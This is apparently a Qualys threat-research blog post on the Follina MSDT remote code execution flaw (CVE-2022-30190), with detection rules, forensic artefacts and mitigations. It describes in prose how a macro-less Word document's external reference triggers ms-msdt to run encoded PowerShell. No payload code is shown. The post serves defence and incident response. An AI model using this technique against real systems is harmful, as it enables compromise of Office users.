Detect the Follina MSDT Vulnerability (CVE-2022-30190) with Qualys Multi-Vector EDR & Context XDR

Mayuresh Dani

A new remote code execution vulnerability called “Follina” has been found lurking in most Microsoft products. In this blog, we examine a potential attack vector as well as technical details of Follina, and chart the ability to detect this new vulnerability using both Qualys Multi-Vector EDR and Qualys Context XDR.

On May 27, 2022, a security researcher tweeted about a malicious Microsoft Word document with alarmingly low detection rates that he had found on VirusTotal. Only four vendors detected the document back then. Eventually, as other researchers saw the harmful potential of this low-interaction vulnerability, Microsoft acknowledged the threat and assigned CVE-2022-30190 for tracking purposes.

Based on the attribution provided by Microsoft, it was discovered that another user – “crazyman” with the Shadow Chaser Group – had initially reported this vulnerability back in April. This new remote code execution vulnerability has been dubbed Follina in reference to the area code of an Italian town. More importantly, although it has been confirmed by Microsoft, as of this writing it has yet to be patched. Recent reports already mention the targeting of local U.S. and European government personnel and a major telecommunication provider in Australia.

The Follina vulnerability’s footprint is significant as it affects ALL Microsoft Office versions – 2013 and above – on ALL currently supported Microsoft Windows operating systems – even the latest: Windows Server 2022! Microsoft Office is the most popular productivity suite on Earth, installed on 1B+ devices worldwide.

What makes this new MS Word vulnerability unique is the fact that there are no macros exploited in this attack. Most malicious Word documents leverage the macro feature of the software to deliver their malicious payload. As a result, normal macro-based scanning methods will not work to detect Follina. Like all vulnerabilities that involve social engineering, the bar for exploitation is low. All an attacker needs to do is lure a targeted user to download a Microsoft document or view an HTML file embedded with the malicious code.

Phases of an Attack Exploiting the Follina Vulnerability

This pictogram represents the attack chain of a typical exploit leveraging Follina (fig.1):

Fig.1: Follina attack chain

Here are the steps we observed:

Step 1: The attacker sends an email containing a malicious Microsoft Office document (.docx, etc.) to the targeted user.
Step 2: The user executes this file, which resolves and executes the attacker-controlled external resource from the document.xml.ref file.
Step 3: Code exploiting the Follina vulnerability is now served to the user.
Step 4: This code then launches additional commands like downloading Remote Access Trojans, etc.

Technical Details of Follina: CVE-2022-30190

Qualys found the macro-less MS Word document leveraged a novel technique by referencing an external resource, which in turn called a malicious page. This page then called the ms-msdt: URL protocol handler, to execute PowerShell script code. ms-msdt: resources are handled by the Microsoft Support Diagnostic Tool (MSDT). This legitimate Microsoft tool is a part of Microsoft’s troubleshooting pack. It should be on cybersecurity’s detection radar, since it features prominently in the LOLBAS project – albeit with different payloads. LOLBAS exists to document every binary, script, and library that can be used for Living Off The Land techniques. Our research found that modern operating systems such as Windows 2016 that do not have msdt.exe by default are nevertheless also vulnerable to Follina.

A Follina attack involves loading an external reference pointing to a malicious URL. That said, even with macros disabled on a system, the “Protected View” feature can be used to execute code under the security context of the user running the MS Office document. Additionally, there are the location.href and window.location.href HTML methods. In a malicious Microsoft Office document, the OLE Object external reference in the document.xml.refs file contains a URL that ends with a “!”. Figure 2 below shows how the code appears:

Fig.2: document.xml.refs pointing to external reference

When the user clicks on the document, a call is made to the host hxxp:// external URL resource, which then serves a malicious document containing a malicious ms-msdt: command-invoking PowerShell script code. Figure 3 shows the malicious code hosted:

Fig.3: Sample payload showcasing launch of PowerShell via ms-msdt

As shown in the image above, most samples observed in the wild involve base64 encoded script code. This base64 encoded PowerShell script code (fig.4, in blue) is decoded (in white) to:

Fig.4: PowerShell script code, decoded

Another variant that we observed involved the use of this malicious code (fig.5):

Fig.5: Decoded PowerShell script code variant 2

Qualys Multi-Vector EDR Can Detect Follina

In April 2022, Qualys delivered Multi-Vector EDR 2.0 which features comprehensive threat detection and enhanced prioritization for security teams to quickly respond to the most critical incidents. Qualys Multi-Vector EDR then prevents future attacks from emerging threats like Follina by identifying and eliminating vulnerabilities exploited by malware.

Rules detecting the kind of Follina attack chain described above are already available in and mapped to T1203, according to the MITRE ATT&CK framework. Our updated EDR offering operationalizes MITRE ATT&CK tactics, not just techniques.

Detection of MSDT.exe with suspicious arguments


One of the first markers of exploitation is msdt.exe executing base64 encoded PowerShell, as shown above (fig.6).

Associated process tree


Evidence of exploitation of this vulnerability is the parent-child relationship between winword.exe executing msdt.exe (fig.7).

Qualys Context XDR Can Detect Follina

We launched Qualys Context XDR back in February 2022. Since its introduction, we have continued to add new features to our cloud service, and one that will soon be available is support for SYSMON. Context XDR will leverage the process creation, network connection, and file creation logging features from the Windows Event log.

Let’s show how we implement the different fields provided by the following three event IDs into a sample rule logic:

  1. Event ID 1: Process creation
    Logs the relationship between msdt.exe and a Microsoft Office executable along with its command line parameters.
  2. Event ID 3: Network connection
    Logs network activities via msdt.exe
  3. Event ID 22: DNSEvent (DNS query)
    Logs name resolutions to reach malicious resources

This easily translates into a Qualys Context XDR rule as follows (fig.8):

Fig.8: Partial Qualys Context XDR rule logic

Post-processing of events leads to a screen like the one below (fig.9):

Fig.9: Correlation of an exploitation event in Qualys Context XDR

An alerting event is created by correlating the values of different Sysmon fields. Figure 10 shows these enriched values in additional detail:

Fig.10: Excerpt of values correlating Sysmon fields to create alert

How to Detect Folina Exploitation Attempts (CVE-2022-30190)

Information that Microsoft saves as a part of diagnostic logs definitely helps determine if a system was compromised by leveraging the Follina vulnerability (CVE-2022-30190). The MSDT webpage lists the following default locations for looking up diagnostic information post-execution that are controlled via a “/dt” command line parameter:

  1. %LOCALAPPDATA%\Diagnostics 
  2. %LOCALAPPDATA%\ElevatedDiagnostics

In the Qualys Research Team’s test system, the diagnostic data was stored under:

%LOCALAPPDATA%\Diagnostics\<9-digit-number>\<date YYYYMMDD.000>

These directories contain several files that can help Digital Forensics and Incident Response personnel to determine what file was run. For example, figure 11 is an excerpt from a PCW.debugreport.xml file in one of our test systems that shows the path and the binary that was run:

Fig.11: AppName value in PCW.debugreport.xml depicting the command run via Follina

Additionally, in case the above XML file is tampered with, the ResultReport.xml file also gives us more details as shown below (fig.12):

Fig.12: Additional forensics information present in ResultReport.xml


Above all, the Qualys Research Team recommends that enterprises take all appropriate steps mentioned by Microsoft to remediate this vulnerability until patches are made available. Security teams may also add custom AppLocker publisher rules to block msdt.exe from executing or apply an Attack Surface Remediation rule to block all Office applications from creating child processes. Additionally, avoid clicking on unsolicited email communications and enable Qualys Multi-Vector EDR and Qualys Context XDR on affected systems.


As a part of the current Patch Tuesday release, Microsoft has released updates remediating this vulnerability.




T1566.001Initial AccessPhishing: Spearphishing Attachment
T1059.001ExecutionCommand and Scripting Interpreter: PowerShell
T1203ExecutionExploitation for Client Execution


  • Arun Pratap Singh, Engineer, Threat Research, Qualys
  • Pawan N, Engineer, Threat Research, Qualys
Share your Comments


Your email address will not be published.